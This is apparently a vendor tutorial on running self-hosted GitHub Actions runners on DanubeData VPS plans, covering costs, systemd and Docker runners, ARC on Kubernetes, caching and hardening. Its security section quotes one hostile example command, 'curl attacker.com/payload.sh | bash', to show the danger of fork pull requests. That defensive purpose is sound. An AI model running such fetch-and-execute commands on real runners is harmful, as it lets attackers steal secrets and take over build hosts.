GitHub Actions is one of the best CI/CD platforms ever shipped, but the minute bill is a different story. If your team runs more than a few hundred minutes a day of Linux jobs on private repos, the pennies per minute stack up fast — and you still get capped at 6-hour jobs, 2 vCPUs, and 7 GB of RAM on the default runner.
Self-hosted runners flip that equation. You bring the compute (a €12.49/mo DanubeData DD Small, a Kubernetes cluster, or a beefy dedicated server), GitHub brings the queue, the UI, and the workflow syntax. Same .github/workflows/*.yml files, same logs, same UX — just running on hardware you control, with the CPU, RAM, disk, and network you actually need.
This guide walks through every way to run self-hosted runners in 2026: the official actions/runner binary on a single VPS, actions-runner-controller (ARC) on Kubernetes for ephemeral autoscaling, Docker-based disposable runners, and how to secure all of it so a malicious pull request doesn't turn your build box into a crypto miner. We also break down when self-hosting actually saves you money (spoiler: almost always, past ~1,500 billable Linux minutes a month) and when to stick with GitHub-hosted runners.
If you're looking for how to deploy from GitHub Actions to a VPS, see our sibling guide on deploying to a VPS from GitHub Actions. This post is about running the CI jobs themselves on your VPS.
The Real Cost of GitHub-Hosted Runners
GitHub gives every account a pool of free minutes and then bills $0.008/min for Linux x64 runners on private repos. The free allowance depends on the plan:
| Plan | Free Linux minutes/month | Overage (Linux x64, 2vCPU) | Windows multiplier | macOS multiplier |
|---|---|---|---|---|
| Free | 2,000 | $0.008/min | 2x | 10x |
| Team | 3,000 | $0.008/min | 2x | 10x |
| Enterprise | 50,000 | $0.008/min | 2x | 10x |
| Public repos | Unlimited free | — | — | — |
That $0.008/min sounds cheap until you do the math. A realistic small team running CI on a handful of services:
- 8 hours of CI per day × 20 working days = 160 hours/month = 9,600 minutes
- 9,600 − 3,000 free = 6,600 billable minutes
- 6,600 × $0.008 = $52.80/month
Now add a Docker-heavy monorepo with 15 engineers:
- 30 PRs per day, each triggering 10 min of CI = 300 min/day × 22 days = 6,600 min/month
- Plus main branch builds, nightly e2e, security scans = another 10,000+ min/month
- ~16,600 total minutes/month; after the 3,000 free, that's ~13,600 billable, or ~$109/month just for CI
Move to a larger runner (GitHub's 8-vCPU runner is $0.032/min, and larger runners don't draw from the free allowance) and the same workload costs over $500/month. The 64-vCPU runner? $0.256/min. It's not hard to find teams spending $2,000-$5,000/month on GitHub-hosted runners for heavy CI pipelines — especially once you factor in Docker builds, integration tests, and large repos.
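To sanity-check these numbers against your own workload, here's a small helper — a sketch that assumes the Team plan's 3,000 free minutes and the $0.008/min default Linux rate; adjust both for your plan:

```shell
#!/usr/bin/env sh
# Back-of-the-envelope monthly GitHub Actions bill.
# Assumptions: Team plan (3,000 free minutes) and the $0.008/min
# rate for the default 2-vCPU Linux runner.
gha_cost() {
  awk -v m="$1" 'BEGIN {
    free = 3000; rate = 0.008
    billable = (m > free) ? m - free : 0
    printf "%.2f\n", billable * rate
  }'
}

gha_cost 9600    # small-team example from above
gha_cost 16600   # monorepo example from above
```

At 9,600 minutes this prints 52.80, matching the earlier math; push the input past roughly 4,700 total minutes and the bill overtakes a €12.49 flat-rate VPS.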
Meanwhile, a DanubeData DD Small VPS with 4 vCPU / 8 GB RAM / 100 GB NVMe runs €12.49/month flat. Unlimited minutes. 20 TB of traffic. No 6-hour job cap. You see where this is going.
Why Self-Host? (And When Not To)
Reasons to self-host runners
- Cost. Past ~1,500 billable minutes/month, a single €12.49 VPS is cheaper than GitHub-hosted. Past 5,000 min/month the savings are 10x.
- No 6-hour job cap. GitHub-hosted jobs are killed at exactly 6 hours. Self-hosted runners have no such cap — useful for full e2e suites, large Docker builds, or Terraform plans against a giant state file.
- More CPU, RAM, disk. GitHub's default runner is 2 vCPU / 7 GB RAM / 14 GB SSD. A DanubeData DD Medium gives you 8 vCPU / 16 GB RAM / 200 GB NVMe for €24.99/month — 4x the CPU, 2x the RAM, 14x the disk, forever, not per-minute.
- Caching between runs. Your checkout, node_modules, cargo registry, Docker layer cache, Gradle dependencies — they persist on disk between runs. A warm cache turns a 12-minute cold build into a 90-second incremental one.
- Access to internal network. Private VPCs, internal package registries, staging databases — all reachable without NAT tricks or VPN gymnastics.
- Secrets never leave your box. Build secrets, signing keys, SSH keys to production — they stay on a machine you control, not a third-party shared runner.
- GPU, ARM, and exotic architectures. Need an ARM64 runner? A GPU runner for ML? Self-hosting is the only path that doesn't charge $0.07/min.
Reasons to stay on GitHub-hosted
- Public open-source repos. Public repos get unlimited free minutes. Unless you need >6h jobs or GPUs, there's no reason to self-host.
- Low volume. If you burn <1,000 min/month, GitHub-hosted is free on most plans. Don't add a VPS to your maintenance pile for nothing.
- Security paranoia for public-repo PRs. Self-hosted runners should never run untrusted code from public-repo forks. More on this below.
- No ops team. Self-hosting means patching OS, rotating runner tokens, monitoring disk fill. If you have zero operational bandwidth, stick with managed.
The Big Tradeoff: Security
This cannot be said enough: never expose a self-hosted runner to pull requests from forks on a public repository. A malicious PR can modify the workflow YAML to run arbitrary code — curl attacker.com/payload.sh | bash — on your runner, reading any secret, stealing any credential, pivoting to your internal network.
GitHub's own docs are explicit: self-hosted runners are for private repos or trusted-only workflows. If you want CI on a public repo, either keep public-repo PR jobs on GitHub-hosted runners or gate self-hosted jobs with a guard like this:
jobs:
  build:
    # Only run self-hosted for PRs from the same repo (not forks)
    if: github.event.pull_request.head.repo.full_name == github.repository
    runs-on: [self-hosted, linux, danubedata]
    steps:
      - uses: actions/checkout@v4
      - run: make build
Combine that with ephemeral runner mode (one job, then the runner tears down) so a malicious job can't persist state across runs. We'll cover both below.
Your Four Self-Hosted Runner Options
There are four production-grade ways to run self-hosted runners in 2026:
| Option | Best for | Complexity | Ephemeral? |
|---|---|---|---|
| 1. actions/runner + systemd | Single VPS, small teams, stable hardware caches | Low | Optional |
| 2. actions-runner-controller (ARC) | K8s shops, autoscaling, ephemeral-by-default | Medium-High | Yes (ephemeral pods) |
| 3. myoung34/docker-github-actions-runner | Docker-only hosts, quick iteration | Low | Yes (container per job) |
| 4. runs-on (self-hosted orchestrator) | AWS-heavy teams wanting spot autoscaling | Medium | Yes |
Third-party managed services like BuildJet, Blacksmith, and Namespace also exist — they're "self-hosted runner as a service" where someone else maintains the infrastructure. Faster than GitHub-hosted, usually cheaper, but you're back to paying per-minute and trusting a third party. We don't cover those here because this guide is about running CI on hardware you own.
For the majority of teams on a DanubeData VPS, Option 1 or Option 3 is the right starting point. Jump to Option 2 once you have a Kubernetes cluster and >50 CI jobs per hour. Let's build all three.
Hardware Sizing: Which DanubeData VPS?
| Workload | Recommended plan | Specs | Price |
|---|---|---|---|
| Node.js/JS unit tests, small Python projects | DD Nano or DD Micro | 2 vCPU / 2-4 GB / 40-60 GB | €4.49 - €7.49/mo |
| Docker builds, Go, small Rust, Laravel CI | DD Small | 4 vCPU / 8 GB / 100 GB NVMe | €12.49/mo |
| Heavy Docker + integration tests, moderate monorepo | DD Medium | 8 vCPU / 16 GB / 200 GB NVMe | €24.99/mo |
| Large monorepo, Rust full rebuilds, ML jobs, K8s host | DD Large | 16 vCPU / 32 GB / 400 GB NVMe | €49.99/mo |
For the rest of this guide we'll assume DD Small (€12.49/mo), which is the sweet spot for 90% of teams — 4 dedicated AMD EPYC vCPU threads, 8 GB RAM, 100 GB of dedicated NVMe, and 20 TB of included traffic. It outperforms GitHub's default 2-vCPU runner by ~2x on Docker builds and by ~4x on parallelizable Go/Rust compilation.
Option 1: Standard actions/runner on a Single VPS
This is the simplest path and the one you'll want to start with. One runner, one VPS, systemd to keep it alive, labels so only your jobs target it.
Step 1: Provision the VPS
- Head to danubedata.ro/vps/create and launch a DD Small
- Pick Ubuntu 24.04 LTS (we'll use systemd and Docker, both are first-class)
- Use a new €50 signup credit — that covers 4 months of the DD Small free
- Note the public IPv4
Step 2: Harden the base system
# SSH in as root
ssh root@YOUR_VPS_IP
# Full update
apt update && apt upgrade -y
# Install essentials
apt install -y curl wget git ufw jq build-essential ca-certificates unzip
# Basic firewall — only SSH inbound, runner is outbound-only
ufw default deny incoming
ufw default allow outgoing
ufw allow OpenSSH
ufw --force enable
# Create a dedicated non-root user for the runner
# NEVER run the runner as root — any malicious build step gets root too
adduser --disabled-password --gecos "" actions
usermod -aG sudo actions
Note the firewall: GitHub Actions runners are outbound-only. They poll GitHub's API over HTTPS for new jobs. You don't need to open any inbound ports, which means the runner is not reachable from the public internet at all. Nice side effect of how the protocol works.
Step 3: Install Docker (so jobs can use docker build)
# Install Docker Engine + Compose plugin
curl -fsSL https://get.docker.com | sh
apt install -y docker-compose-plugin
# Let the runner user talk to Docker without sudo
usermod -aG docker actions
# Verify
sudo -u actions docker run --rm hello-world
Step 4: Download the runner binary
GitHub publishes a pre-built runner binary for Linux x64. You can grab it from the repo/org settings page, but it's easier to script.
# Switch to the runner user
su - actions
# Create runner directory
mkdir ~/actions-runner && cd ~/actions-runner
# Get the latest runner version dynamically
RUNNER_VERSION=$(curl -s https://api.github.com/repos/actions/runner/releases/latest | jq -r '.tag_name | sub("^v"; "")')
echo "Installing runner $RUNNER_VERSION"
# Download
curl -o actions-runner-linux-x64.tar.gz -L \
  "https://github.com/actions/runner/releases/download/v${RUNNER_VERSION}/actions-runner-linux-x64-${RUNNER_VERSION}.tar.gz"
# Extract
tar xzf actions-runner-linux-x64.tar.gz
# Verify
ls -la config.sh run.sh
Step 5: Register the runner with GitHub
In your GitHub repo (or org, for reuse across many repos), go to Settings → Actions → Runners → New self-hosted runner. GitHub will give you a one-time registration token that looks like AABBCC...XYZ. Copy it.
# Still as the 'actions' user, in ~/actions-runner
./config.sh \
  --url https://github.com/YOUR_ORG/YOUR_REPO \
  --token YOUR_REGISTRATION_TOKEN \
  --name "danubedata-dd-small-01" \
  --labels "self-hosted,linux,x64,danubedata,docker" \
  --work "_work" \
  --unattended \
  --replace
The --labels flag matters a lot. These labels are how your workflow files select this runner. We add danubedata and docker as custom labels so you can target this specific runner pool in your YAML.
For org-level runners (available across many repos), use the org URL https://github.com/YOUR_ORG and request an org registration token from Org Settings → Actions → Runners.
Step 6: Run as a systemd service
# Back to root (exit from 'actions' user first)
exit
# The runner ships with a helper that installs a systemd unit
cd /home/actions/actions-runner
./svc.sh install actions
./svc.sh start
# Check status
./svc.sh status
systemctl status actions.runner.YOUR_ORG-YOUR_REPO.danubedata-dd-small-01.service
The unit will be named actions.runner.ORG-REPO.RUNNER_NAME.service and systemd will auto-restart it if the runner crashes or the VPS reboots. Logs land in journalctl:
journalctl -u 'actions.runner.*' -f
Step 7: Target the runner in your workflow
name: CI
on:
  push:
    branches: [main]
  pull_request:
    branches: [main]
jobs:
  test:
    # Any runner with ALL of these labels
    runs-on: [self-hosted, linux, danubedata, docker]
    steps:
      - uses: actions/checkout@v4
      - name: Set up Node
        uses: actions/setup-node@v4
        with:
          node-version: '20'
          cache: 'npm'
      - run: npm ci
      - run: npm run lint
      - run: npm test
      - name: Build Docker image
        run: docker build -t myapp:${{ github.sha }} .
Push that to GitHub, open the Actions tab, and you should see the job pick up on your new runner within a few seconds. Congratulations — you just saved yourself $0.008/min.
Step 8: Ephemeral mode (strongly recommended)
By default the runner is persistent: it stays registered and picks up job after job. That's fast, but it also means any file a job writes (tempfiles, caches, malicious payloads) persists to the next job.
Ephemeral mode makes the runner handle exactly one job and then exit. Combined with a systemd restart, you get a fresh runner per job:
# Re-configure with --ephemeral
./config.sh remove --token YOUR_REMOVAL_TOKEN
./config.sh \
  --url https://github.com/YOUR_ORG/YOUR_REPO \
  --token YOUR_NEW_REGISTRATION_TOKEN \
  --name "danubedata-dd-small-01" \
  --labels "self-hosted,linux,x64,danubedata,docker" \
  --work "_work" \
  --ephemeral \
  --unattended \
  --replace
Then wrap the runner in a restart loop (or a systemd unit with Restart=always) so it re-registers after each job. A simpler route: use Option 3 (Docker) or Option 2 (ARC) — both are ephemeral by default.
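Concretely, the loop can live in systemd itself. A sketch (not the unit svc.sh installs): Restart=always relaunches the ephemeral runner after every job, and a hypothetical helper script you'd write against GitHub's registration-token API re-registers before each start:

```ini
# /etc/systemd/system/gha-runner-ephemeral.service (sketch; not the svc.sh unit)
[Unit]
Description=Ephemeral GitHub Actions runner (one job per start)
After=network-online.target
Wants=network-online.target

[Service]
User=actions
WorkingDirectory=/home/actions/actions-runner
# Hypothetical helper that fetches a fresh registration token and re-runs config.sh
ExecStartPre=/usr/local/bin/reregister-runner.sh
ExecStart=/home/actions/actions-runner/run.sh
# --ephemeral makes run.sh exit after one job; Restart=always picks up the next
Restart=always
RestartSec=5

[Install]
WantedBy=multi-user.target
```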
Option 3: Docker-Based Ephemeral Runners with myoung34/docker-github-actions-runner
If all your jobs run inside containers anyway, skip the systemd dance and run the runner itself as a container. The community image myoung34/docker-github-actions-runner is the de facto standard for this.
Step 1: Create a GitHub App or PAT for auto-registration
Docker runners auto-register on startup using either a GitHub App private key or a Personal Access Token with repo + workflow + admin:org (for org-level runners) scope. App-based auth is better for production — finer-grained permissions, auditable, rotatable.
For this quick guide we'll use a PAT. Create one at https://github.com/settings/tokens with the repo scope (for repo-level) or admin:org (for org-level). Save as GH_RUNNER_TOKEN.
Step 2: Compose file with three ephemeral workers
# /opt/runners/docker-compose.yml
services:
  runner-1:
    image: myoung34/github-runner:ubuntu-noble
    restart: always
    environment:
      REPO_URL: https://github.com/YOUR_ORG/YOUR_REPO
      RUNNER_NAME: danubedata-docker-01
      RUNNER_SCOPE: repo  # or "org"
      LABELS: self-hosted,linux,x64,danubedata,docker,ephemeral
      ACCESS_TOKEN: ${GH_RUNNER_TOKEN}
      EPHEMERAL: "true"
      DISABLE_AUTO_UPDATE: "true"
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
      - runner-1-work:/_work
    security_opt:
      - no-new-privileges:true

  runner-2:
    image: myoung34/github-runner:ubuntu-noble
    restart: always
    environment:
      REPO_URL: https://github.com/YOUR_ORG/YOUR_REPO
      RUNNER_NAME: danubedata-docker-02
      RUNNER_SCOPE: repo
      LABELS: self-hosted,linux,x64,danubedata,docker,ephemeral
      ACCESS_TOKEN: ${GH_RUNNER_TOKEN}
      EPHEMERAL: "true"
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
      - runner-2-work:/_work

  runner-3:
    image: myoung34/github-runner:ubuntu-noble
    restart: always
    environment:
      REPO_URL: https://github.com/YOUR_ORG/YOUR_REPO
      RUNNER_NAME: danubedata-docker-03
      RUNNER_SCOPE: repo
      LABELS: self-hosted,linux,x64,danubedata,docker,ephemeral
      ACCESS_TOKEN: ${GH_RUNNER_TOKEN}
      EPHEMERAL: "true"
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
      - runner-3-work:/_work

volumes:
  runner-1-work:
  runner-2-work:
  runner-3-work:
# Deploy
cd /opt/runners
echo "GH_RUNNER_TOKEN=ghp_xxxxxxxxxxxxxxxx" > .env
chmod 600 .env
docker compose up -d
# Watch them register
docker compose logs -f
You now have 3 parallel runners on a single DD Small, each ephemeral, each auto-replacing itself after a job. On an 8 GB / 4 vCPU box you can comfortably run 3-4 parallel CI jobs for typical Node/Python workloads. For Docker-heavy pipelines, 2 concurrent runners is the sweet spot.
Security note: the Docker socket mount
Mounting /var/run/docker.sock into the runner gives it full control of the Docker daemon — which is effectively root on the host. Acceptable for trusted private repos, dangerous for anything that might run untrusted code. Alternatives:
- Docker-in-Docker (dind): run a nested Docker daemon inside the runner container. Slower, but isolates the host from builds.
- Rootless Docker: the myoung34/github-runner:ubuntu-noble-dind-rootless variant runs dind as a non-root user.
- Podman: a drop-in Docker replacement that's rootless by default.
Option 2: actions-runner-controller (ARC) on Kubernetes
Once you need more than ~10 concurrent runners, static Docker containers stop being the right answer. You want autoscaling to zero — runners that only exist for the duration of a single job, with the Kubernetes scheduler placing them across your node pool based on current demand.
This is what actions-runner-controller (ARC) does. It's the official GitHub-supported Kubernetes operator, maintained by GitHub itself since 2023.
If you're running a k3s cluster on 2-3 DanubeData VPS nodes (e.g., a DD Medium as control plane + two DD Small workers = €49.97/month for a 12-vCPU cluster), ARC turns all that capacity into an elastic runner pool.
Architecture
- Runner Scale Sets: a pool of runners bound to an org or repo, identified by a name like arc-danubedata
- Ephemeral pods: each job spawns a fresh pod, which runs the job and is then deleted
- Scale to zero: when no jobs are queued, there are zero runner pods
- Scale up on demand: when jobs queue up, ARC creates pods until maxRunners is hit
Step 1: Install ARC
# Install the controller itself
helm install arc \
  --namespace arc-systems \
  --create-namespace \
  oci://ghcr.io/actions/actions-runner-controller-charts/gha-runner-scale-set-controller
# Verify
kubectl get pods -n arc-systems
Step 2: Create a GitHub App for ARC
ARC authenticates to GitHub via a GitHub App (strongly recommended) or PAT. Go to Org Settings → Developer settings → GitHub Apps → New GitHub App. Grant these permissions:
- Actions: Read and write
- Administration: Read and write
- Self-hosted runners: Read and write
- Metadata: Read-only
Install the app on your org, generate a private key (.pem file), and save the App ID + Installation ID + private key as a Kubernetes secret:
kubectl create namespace arc-runners
kubectl create secret generic arc-github-app \
  --namespace arc-runners \
  --from-literal=github_app_id=123456 \
  --from-literal=github_app_installation_id=7890123 \
  --from-file=github_app_private_key=./arc-private-key.pem
Step 3: Deploy a Runner Scale Set
# arc-scale-set.yaml
# Deploy with: helm install arc-danubedata ... -f arc-scale-set.yaml
githubConfigUrl: "https://github.com/YOUR_ORG"
githubConfigSecret: arc-github-app
minRunners: 0
maxRunners: 10
runnerScaleSetName: danubedata
containerMode:
  type: "dind"  # Docker-in-Docker
template:
  spec:
    containers:
      - name: runner
        image: ghcr.io/actions/actions-runner:latest
        command: ["/home/runner/run.sh"]
        resources:
          requests:
            cpu: "500m"
            memory: "1Gi"
          limits:
            cpu: "2"
            memory: "4Gi"
helm install arc-danubedata \
  --namespace arc-runners \
  -f arc-scale-set.yaml \
  oci://ghcr.io/actions/actions-runner-controller-charts/gha-runner-scale-set
# Verify
kubectl get autoscalingrunnerset -n arc-runners
kubectl get pods -n arc-runners -w
Step 4: Target the scale set in workflows
jobs:
  build:
    runs-on: danubedata  # the runnerScaleSetName from the Helm values
    steps:
      - uses: actions/checkout@v4
      - run: make ci
Push a commit and watch ARC spin up a fresh pod for the job, then delete it after. Queue 10 jobs at once and ARC will create 10 pods in parallel (up to maxRunners), completing the whole pipeline in the time of a single job. When idle, zero pods, zero overhead.
This is also the answer to "how do I get ephemeral, fork-safe runners for a public repo": ARC pods are short-lived containers with no persistent state, which dramatically reduces the blast radius if a malicious PR slips through. Combine with the PR guard we showed earlier and you have a production-grade setup.
Option 4: runs-on and other orchestrators
For completeness: runs-on is a clever open-source orchestrator that runs self-hosted runners on AWS EC2 spot instances. Sophisticated autoscaling, startup in ~30s, billed by AWS (often cheaper than GitHub-hosted even with spot pricing). It's AWS-specific though, so less relevant for a DanubeData guide.
If you want similar orchestration on Hetzner/DanubeData, ARC with the Kubernetes Cluster Autoscaler + Hetzner's cloud-controller-manager is the closest equivalent — and since DanubeData runs on Hetzner bare metal, you're already in that ecosystem.
Caching: The Self-Hosted Runner Superpower
On a GitHub-hosted runner, every job starts from a clean VM. That means downloading every dependency, every time. actions/cache helps, but the cache is remote — you're pulling 500 MB of node_modules over HTTPS on every run.
On a self-hosted runner, caches can live on local disk, surviving between jobs. A warm cache turns minutes into seconds.
Strategy 1: actions/cache still works
The built-in actions/cache action works on self-hosted runners, but it still uploads to GitHub's remote cache service (10 GB quota per repo); it does not write to local disk. On a persistent runner, though, the directories it would cache often survive between jobs anyway:
- name: Cache node_modules
  uses: actions/cache@v4
  with:
    path: ~/.npm
    key: ${{ runner.os }}-node-${{ hashFiles('**/package-lock.json') }}
Because the runner's home directory persists on the same host between runs (unless the runner is ephemeral), ~/.npm stays warm naturally; the remote cache is only a fallback for cold starts.
Strategy 2: Shared host volume for ephemeral runners
If you use ephemeral Docker runners, each job is a fresh container — nothing persists by default. Mount a shared cache volume to every runner:
services:
  runner-1:
    image: myoung34/github-runner:ubuntu-noble
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
      - /opt/ci-cache:/cache  # shared host path
    environment:
      EPHEMERAL: "true"
      # ...
Then in your workflow:
- name: Symlink caches to shared volume
  run: |
    mkdir -p /cache/npm /cache/docker
    ln -sfn /cache/npm ~/.npm
    ln -sfn /cache/docker ~/.docker
This gives you a persistent cache across ephemeral jobs. Downside: concurrent jobs can race on the cache directory. A locking wrapper or per-job subdirectory solves it (/cache/${{ github.sha }}).
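A minimal sketch of that locking wrapper using flock(1) from util-linux — the /cache path matches the compose mount above, and the lock-file name is our own convention:

```shell
#!/usr/bin/env sh
# Serialize cache mutation across concurrent jobs with flock(1).
# A second job reaching this block waits (up to 60s) instead of
# racing the first job's writes.
CACHE_DIR=${CACHE_DIR:-/tmp/ci-cache}   # /cache on a real runner
mkdir -p "$CACHE_DIR"

(
  flock -w 60 9 || { echo "cache lock timeout"; exit 1; }
  # --- critical section: safe to restore/update the shared cache ---
  echo "cache ready in $CACHE_DIR"
  # e.g. ln -sfn "$CACHE_DIR/npm" ~/.npm
) 9>"$CACHE_DIR/.lock"
```

File descriptor 9 holds the lock for exactly the lifetime of the subshell, so there's no cleanup step to forget.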
Strategy 3: Docker BuildKit + registry cache
For Docker builds specifically, docker buildx build --cache-from type=registry pushes layer caches to any OCI registry (GHCR, Harbor, GitLab, or even MinIO on the same VPS). Works across runners and reboots:
- name: Set up Buildx
  uses: docker/setup-buildx-action@v3
- name: Build with registry cache
  uses: docker/build-push-action@v5
  with:
    context: .
    push: true
    tags: ghcr.io/${{ github.repository }}:${{ github.sha }}
    cache-from: type=registry,ref=ghcr.io/${{ github.repository }}:buildcache
    cache-to: type=registry,ref=ghcr.io/${{ github.repository }}:buildcache,mode=max
Cost Comparison: GitHub-Hosted vs DanubeData Self-Hosted
| Usage profile | Monthly Linux minutes | GitHub-hosted (Team, 3k free) | DanubeData DD Small | DanubeData DD Medium | Annual savings vs GH |
|---|---|---|---|---|---|
| Solo dev, small project | 500 min | $0 (free tier) | €12.49 | €24.99 | -€150 (stay on GH) |
| Small team, light CI | 2,000 min | $0 (free tier) | €12.49 | €24.99 | Break-even |
| Team, moderate CI | 8,000 min | $40/mo ($480/yr) | €12.49 (€150/yr) | €24.99 (€300/yr) | ~$330/yr |
| Team, heavy CI / Docker | 20,000 min | $136/mo ($1,632/yr) | €12.49 (€150/yr) | €24.99 (€300/yr) | ~$1,330/yr |
| Monorepo, integration tests | 50,000 min | $376/mo ($4,512/yr) | €12.49 (€150/yr) | €24.99 (€300/yr) | ~$4,200/yr |
| Large team, 4x larger runner ($0.032/min, no free allowance) | 30,000 min | $960/mo ($11,520/yr) | DD Large €49.99 (€600/yr) | 2× DD Large €99.98 (€1,200/yr) | ~$10,200/yr |
Break-even is around 3,500-5,000 total Linux minutes per month (roughly 1,500-2,000 billable after the free allowance). Below that, GitHub-hosted is fine. Above that, self-hosting on a DanubeData VPS saves 80-95% and gives you more CPU, RAM, and disk per euro than any managed runner service on the market.
Security Hardening Checklist
If you take away one thing from this guide, it's this: self-hosted runners run untrusted code in the context of whoever you let push to the repo. Treat the runner like a production server that occasionally runs arbitrary scripts, because that's exactly what it is.
- Never run the runner as root. Use a dedicated actions user, and revoke sudo after setup if possible.
- Always use ephemeral mode for public repos. Or just don't use self-hosted on public repos at all.
- Gate fork PRs. Put if: github.event.pull_request.head.repo.full_name == github.repository on every self-hosted job.
- Firewall outbound too. A compromised runner will try to exfiltrate data. Consider an egress allowlist if you're paranoid (Cilium or nftables).
- Rotate registration tokens. GitHub registration tokens are short-lived (~1 hour). For long-lived runners, use a GitHub App with rotatable keys.
- Separate per-repo or per-team runners. Don't share one VPS across your whole org — blast radius should match trust boundaries.
- Mount /var/run/docker.sock only if you trust every workflow on that repo. Otherwise use rootless dind.
- Pin action versions to SHA, not tags. uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11, not @v4.
- Restrict GITHUB_TOKEN permissions. Default to permissions: {} and grant only what each job needs.
- Monitor disk fill. Runners leak _work directories. Add a cron job to clean _work/*/* entries older than 24h.
- Set up fail2ban on SSH. Standard VPS hygiene.
- Use no-new-privileges in Docker. Prevents setuid escalations inside containers.
Operational Essentials
Disk cleanup cron
Runners accumulate _work/<repo>/<repo> directories forever. Add to the runner user's crontab:
# Weekly cleanup — runner will re-checkout on next job
0 3 * * 0 find /home/actions/actions-runner/_work -maxdepth 2 -mindepth 2 -mtime +3 -exec rm -rf {} +
Docker prune
# Run as root or a docker-group user
docker system prune -af --filter "until=72h"
# Volume pruning doesn't honor the "until" filter; if you also want
# stale build volumes gone, run: docker volume prune -f
Schedule daily. Docker layer caches can eat 50-100 GB in a week on a busy runner.
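As a concrete example, a root crontab entry (the 03:30 time is an arbitrary choice):

```
# Daily image/container prune; keeps the last 72h of layer cache
30 3 * * * docker system prune -af --filter "until=72h" >/dev/null 2>&1
```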
Monitoring
Install node_exporter + scrape from an existing Prometheus, or use a lightweight cloud agent. Key metrics:
- Disk free on /home/actions — alert at <15% free
- Load average — sustained >1.5x vCPU count means it's time to upgrade
- Memory pressure — OOM kills will silently fail runner jobs
- Runner last-heartbeat — GitHub marks a runner offline after ~1 min of no heartbeat
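If you don't have Prometheus wired up yet, even a cron'd shell check catches the most common failure, disk fill. A sketch — the threshold, filesystem, and notifier hook are all assumptions to tune:

```shell
#!/usr/bin/env sh
# Disk-fill check: the predicate is a pure function so the alert
# logic is easy to test; df supplies the live number.
check_usage() {
  # $1 = used percent, $2 = alert threshold percent
  if [ "$1" -gt "$2" ]; then
    echo "ALERT: ${1}% used"
  else
    echo "OK: ${1}% used"
  fi
}

# Live usage of the root filesystem (use /home/actions on the runner)
pct=$(df -P / | awk 'NR==2 { sub(/%/, "", $5); print $5 }')
check_usage "$pct" 85   # wire the ALERT branch to mail/webhook in cron
```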
Updating the runner binary
If you leave DISABLE_AUTO_UPDATE unset (or false), the runner self-updates in place whenever GitHub pushes a new release. Convenient, but it means the binary running your jobs isn't pinned to a known version. For production-grade pipelines, set DISABLE_AUTO_UPDATE=true and update deliberately:
# As root: stop the service (svc.sh wraps the systemd unit)
cd /home/actions/actions-runner
./svc.sh stop
# Switch to the runner user and refresh the binary
su - actions
cd ~/actions-runner
# Re-download and extract the latest release (see Step 4 above), then return to root
exit
./svc.sh start
FAQ
Is it safe to run self-hosted runners for public repositories?
Not out of the box, and not with persistent runners. GitHub explicitly warns against it — any pull request from a fork can modify the workflow and execute arbitrary code on your runner. If you must, use ephemeral runners in a locked-down container (Option 2 or 3), guard every job with if: github.event.pull_request.head.repo.full_name == github.repository, and consider using the pull_request_target event with extreme care. For most public projects, keep public-repo CI on GitHub-hosted and self-host only the private infrastructure workflows.
What's the break-even point vs GitHub-hosted runners?
Roughly 1,500-2,000 billable Linux minutes per month on the $0.008/min tier (about 3,500-5,000 total once you count the free allowance). Below that, the free allowance + low overage cost makes GitHub-hosted more economical. Above that, a single €12.49 DD Small VPS pays for itself within the first week of the month. The break-even drops dramatically (to ~500 min) if you're using the 4x/8x/16x larger GitHub-hosted runners, because those bill 4-16× the base rate from the first minute.
How do I cache dependencies effectively on a self-hosted runner?
Three layers, best used together: (1) actions/cache still works and pushes to GitHub's cache service — useful for cross-runner caching. (2) Local host caches — ~/.npm, ~/.cargo, ~/.gradle persist on a persistent runner for free. (3) Registry-based Docker BuildKit caching (--cache-from type=registry) — best for Docker layer caching across ephemeral runners. For ephemeral Docker runners, mount a shared host volume like /opt/ci-cache:/cache and symlink dependency directories into it at the start of each job.
Can I run Windows or macOS self-hosted runners on a DanubeData VPS?
DanubeData VPS instances run KubeVirt/KVM-backed Linux by default. Windows is technically possible on a DD Medium or DD Large by providing your own licensed Windows ISO — the actions/runner binary has native Windows builds. macOS self-hosted runners require Apple hardware due to Apple's licensing terms; you cannot legally virtualize macOS on non-Apple hardware. For macOS CI you either use GitHub-hosted (expensive at 10× multiplier), a dedicated Mac mini colo, or a macOS-specific cloud like MacStadium.
How do I scale from one runner to many?
Three strategies in order of complexity. (1) Multiple runners on one VPS — run 2-4 parallel runners on a DD Small, labeled with distinct names. Works until you hit CPU/RAM contention. (2) Multiple VPS instances — provision 3 DD Smalls, register each with the same label danubedata, and GitHub load-balances jobs across them. (3) Kubernetes + ARC — a k3s cluster on DanubeData VPSes with autoscaling runner scale sets. Scale to zero when idle, to hundreds of pods under load. ARC is the right call past ~10 concurrent runners.
What's the maintenance burden, realistically?
Plan for 1-2 hours per month on a well-configured setup: (1) OS updates — run unattended-upgrades on Ubuntu so security patches apply automatically. (2) Runner binary updates — ~monthly, 5 min each. (3) Disk cleanup — cron handles it, but check quarterly. (4) Token rotation if using PATs — monthly or use a GitHub App and forget about it. (5) Monitoring alerts — if you have Prometheus already, adding runner metrics is ~30 min one-time. The big ongoing cost is attention during incidents: if a runner gets stuck, jobs queue. A healthy setup alerts you before users notice.
Can I mix self-hosted and GitHub-hosted runners in the same pipeline?
Yes, and it's the recommended pattern. Route heavy jobs (Docker builds, integration tests, long-running workflows) to self-hosted via runs-on: [self-hosted, linux, danubedata], and keep lightweight jobs (linting, markdown checks, docs build) on runs-on: ubuntu-latest. You get cost savings where it matters and GitHub's clean-slate guarantee where you need it.
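A sketch of that split (job names and commands are illustrative):

```yaml
jobs:
  lint:
    runs-on: ubuntu-latest                      # cheap, clean-slate GitHub-hosted
    steps:
      - uses: actions/checkout@v4
      - run: npm run lint

  integration:
    needs: lint
    runs-on: [self-hosted, linux, danubedata]   # heavy job on your VPS
    steps:
      - uses: actions/checkout@v4
      - run: make integration-test
```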
What happens to queued jobs if my runner VPS crashes?
Jobs stay queued in GitHub's control plane until a matching runner picks them up — but not forever: a job that no self-hosted runner claims is discarded after roughly 24 hours, and an entire workflow run times out after 35 days. When your runner reconnects in time, it picks up the next queued job. This is why redundancy matters — run at least 2 runners, and if you run just one, make sure systemd restart-on-failure is configured. With ARC on Kubernetes, losing one node only loses the pods on that node — the controller immediately reschedules onto healthy nodes.
Get Started Today
